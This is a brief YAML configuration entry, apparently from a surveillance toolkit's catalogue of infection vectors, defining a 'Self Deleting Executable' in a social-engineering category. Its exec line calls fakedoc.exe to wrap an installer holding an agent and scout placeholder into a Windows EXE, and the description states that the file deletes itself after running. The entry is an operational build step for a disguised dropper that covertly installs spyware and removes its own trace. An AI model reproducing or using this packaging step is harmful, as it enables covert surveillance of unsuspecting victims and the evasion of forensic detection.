version: 20140930
build: mingw
id: HT-2014-001
name: Self Deleting Executable
category: :social
output: exe
format:
- exe
platform: windows
exec: fakedoc.exe -i installer.exe -a %AGENT% -e exe -n %OUTPUT% -s %SCOUT_NAME% -r 1
embed: true
params:
  test: test
description: "<br><b>Output:</b> EXE file<br><br><b>Note:</b> The resulting EXE will automatically delete itself after execution.<br><br><b>Platform:</b> Windows<br><br><b>Tested on:</b><br>Windows 2000/XP/Vista/7"
